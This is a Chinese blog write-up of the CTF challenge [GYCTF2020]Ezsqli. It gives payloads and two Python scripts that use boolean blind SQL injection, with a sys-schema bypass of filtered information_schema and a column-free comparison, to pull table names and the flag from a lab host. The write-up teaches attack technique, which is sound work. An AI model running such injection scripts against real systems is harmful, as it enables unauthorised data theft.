[GYCTF2020]Ezsqli1

已于 2024-06-11 19:20:14 修改
阅读量371 收藏 2
点赞数 6
文章标签: web安全 安全
于 2024-06-11 19:18:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alwtj/article/details/139606491
版权

典型的sql注入,输个1试试.

用字典扫一下看看都有啥被过滤了~

情理之中,不过又可以用到新的姿势了~

判断一下注入类型.

是数字型,再看看输入1 0 0 / 1 0 0

是个无回显,而且没有过滤空格,那就用盲注~
开始构造payload

(ascii(substr(database(),1,1))>0)

构造成功~

开始python编程~

import requests


url="http://cb6a98e7-a051-4175-9806-4a570d9a6aa4.node5.buuoj.cn:81/"

payload1="(ascii(substr(database(),{},1))>{})"  #数据库
payload2="(ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),{},1))>{})" #表
payload="(ascii(substr((select flag from f1ag_1s_h3r3_hhhhh  ),{},1))>{})"  #数据


data1 = ""
for i in range(1,100):
    low = 32
    hight = 127
    mid = (low + hight) // 2
    while (low<hight):
        py=payload.format(i,mid)
        post_data={"id":py}
        re=requests.post(url,data=post_data)
        print(post_data)
        if "Nu1L" in re.text:
            low=mid+1
        else:
            hight=mid
        mid=(low+hight) // 2
    if mid == 32:
        break
    data1+=chr(mid)
    print(data1)
print(data1)

 这段代码,sys.schema_table_statistics_with_buffer 替代了我们平常使用的information,因为information被过滤了~

不过获取flag的时候我是猜测那张表的column存在一个flag字段~

但是也可以换一种编程去获取flag,内容如下~

import requests

url="http://a79a0791-c781-4102-9833-ba45ad62b746.node5.buuoj.cn:81/"
payload="((select 1,'{}') > (select * from f1ag_1s_h3r3_hhhhh))"
data=""
num=0
for i in range(100):
    for char in range(32,127):
        py=payload.format(data+chr(char))
        post_data={"id":py}
        req=requests.post(url,data=post_data)
        num=char
        print(post_data,req)
        if "Nu1L" in req.text:
            data+=chr(char-1)
            print(data)
            break
    if num==33:
        break

print(data)

不过这段代码,也带了一些猜测,猜测他就只有1行,切第一个字段为id,并且value=1 

alwtj
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP登录环节防止sql注入的方法浅析
10-25
主要介绍了PHP登录环节防止sql注入的方法,需要的朋友可以参考下
[GYCTF2020]Ezsqli
shinygod的博客
04-11 559
知识点:无列名注入 id=1^(length(database())>1)^1 说明这里可以用布尔盲注。 接下来就是三爆了,但是这边把information过滤了,可以用sys.x$schema_flattened_keys绕过。 import requests url = "http://2270547b-9645-4b8f-ace8-e09ed89ae3d2.node4.buuoj.cn:81/index.php" name = "" dic = "qwertyuioplkjhgfdsa
BUU[GYCTF2020]Ezsqli1
weixin_46245411的博客
07-19 619
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 知识点 一、布尔盲注 二、无列名注入 1.知识点 2.实现方式 总结 知识点 布尔盲注以及无列名注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、布尔盲注 在提交部分输入值上传,抓包查看 修改POST传参id的部分值为其他值后 这里就判断出大致使用BOOL盲注来注入 简单的写一段万能SQL语句后 下一步使用字典去fuzz一下,查看有哪些关键词被...
[GYCTF2020]Ezsqli --BUUCTF
金 帛的博客
06-12 728
BUUCTF记录贴
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 419
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
网络安全-基础网络概念1
LS_Ai的博客
07-11 558
计算机网络是一种将多个计算机系统和设备连接在一起的技术,目的是为了共享资源和信息。网络使得设备之间可以进行数据传输和通信,常见的网络包括局域网(LAN)、广域网(WAN)和城域网(MAN)。
在日常生活中,应该如何保护自己的网络安全
2301_79527080的博客
07-16 81
安全的网上购物:• 确保购物网站是安全的,检查网址前缀是否为“https”。• 教育和意识:• 不断学习网络安全知识,了解最新的威胁和防御措施。• 确认网站的URL是否正确,避免访问伪造的网站。• 启用多因素认证(MFA):• 多因素认证可以为账户提供额外的安全层,通常包括你所知道的(密码)、你所拥有的(手机验证码)以及你是谁(生物特征识别)。• 限制公开信息:• 避免在社交媒体上公开过多的个人信息,如旅行计划、工作地点等。• 更新和补丁:• 保持操作系统、软件和应用程序的最新状态,及时安装安全补丁。
网络安全防御 -- 双机热备和带宽管理综合实验
rrl18215821889的博客
07-16 254
12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。16,外网访问内网服务器,下行流量不超过40M,DMZ中的每台服务器限制对外提供的最大下行带宽不超过20M。做负载分担模式,生产区和办公区的流量走FW1,游客区和DMZ区走FW3。配置g0/0/0ip和开启服务。办公区销售部带宽策略;
网络安全-内网安全加固方案
PanDD_0_1的博客
07-12 812
网络安全-内网安全
智能车存在网络安全隐患,如何应设计出更好的安全防护技术?
tigerman20201的博客
07-13 267
然而,高度的网络化和智能化也使智能车面临着严峻的网络安全挑战,如远程攻击、数据泄露和恶意控制等。未来,随着技术的不断发展,应持续加强对智能车网络安全的研究和创新,以应对不断变化的安全威胁。摘要:随着智能车技术的迅速发展,车辆的网络连接性不断增强,然而这也带来了诸多网络安全隐患。本文深入探讨了智能车面临的网络安全威胁,并提出了一系列创新的安全防护技术设计,旨在为智能车的安全运行提供更可靠的保障。黑客可以通过公共网络对智能车的通信系统进行攻击,干扰车辆的正常运行,甚至获取车辆的控制权。
java配置nginx网络安全,防止国外ip访问,自动添加黑名单,需手动重新加载nginx
weixin_44006009的博客
07-13 311
创建一个类,自己添加一个main启动类即可测试。通过访问日志自动添加国外ip黑名单。
网络安全----web安全防范
最新发布
weixin_55357256的博客
07-16 373
以下代码用来防范流行的DDoS攻击,ARP欺骗,CC攻击,XXS攻击,对输入的恶意代码进行过滤,嵌入到web程序可以很好的防范网络攻击,但如果想要更好的防范网络攻击,还需要更加复杂的配置和更硬核的硬件。print(f"可能的 CC 攻击针对资源 {resource} 检测到")# 用于检测 CC 攻击的函数(简单示例,通过监测短时间内对同一资源的请求频率)# 用于检测 XSS 攻击的函数(简单示例,检查输入中是否存在可疑脚本标签)# 用于检测 DDoS 攻击的函数(简单示例,通过监测短时间内的连接数量)
AI基于大模型语言存在的网络安全风险
yh
07-16 234
AI网络安全
智能车的网络安全隐患及其防护技术
tigerman20201的博客
07-13 396
本文分析了智能车的主要网络安全威胁,包括车辆通信系统、自动驾驶系统、以及车载娱乐系统的潜在风险。在此基础上,提出了多层次的安全防护技术,包括加密通信、入侵检测系统、以及区块链技术等,以提升智能车的网络安全水平。智能车的网络安全是一个复杂且重要的问题,需要多层次、多方面的技术防护。通过加密通信、入侵检测系统、区块链技术等多种手段的结合,可以有效提升智能车的安全性,保障乘客和行人的安全。未来,随着技术的进步和标准的完善,智能车的网络安全将得到进一步的保障。**题目:智能车的网络安全隐患及其防护技术**
【网络安全】APDCL:IDOR + 账户接管
等风来
07-13 783
APDCL ,即印度阿萨姆邦电力分销公司(Assam Power Distribution Company Limited),是印度阿萨姆邦政府控制的公共部门企业,负责电力分配和供应服务,确保电力供应的稳定性和可靠性,以满足居民、工业和商业客户的电力需求。
7.13实训日志
Kidding_Ma的博客
07-13 392
作为一名大学生,我深感有责任在今后的学习和职业生涯中,为推动网络安全技术的发展和应用做出贡献,保障数字化社会的安全和稳定发展。在技术方面,我们学习了多种编程语言和工具的应用,如Python用于爬虫和脚本、Java用于代码审计和漏洞挖掘、C语言用于二进制漏洞挖掘等。会上,专家学者们分享了关于网络安全最新的研究成果和技术应用,以及面临的挑战和未来的发展方向,给我留下了深刻的印象和启发。学习网络安全的过程中,我们深入了解了网络的不同层面和技术,从表层网络到深网再到暗网,以及涉及的产业分类和技术工具。
网络安全工作者如何解决网络拥堵
gmqqcsdn的博客
07-15 652
网络如同现代社会的血管,承载着信息的血液流动。然而,随着数据流量的激增,网络拥堵已成为不容忽视的问题,它像是一场数字世界的交通堵塞,减缓了信息传递的速度,扰乱了网络空间的秩序。作为网络安全的守护者,网络安全工作者必须运用战略智慧和技术手段,解决这一难题,确保每一位用户都能享受流畅的在线体验。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-04 2153
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
自学黑客(网络安全
热门推荐
xv7676的博客
07-13 1万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值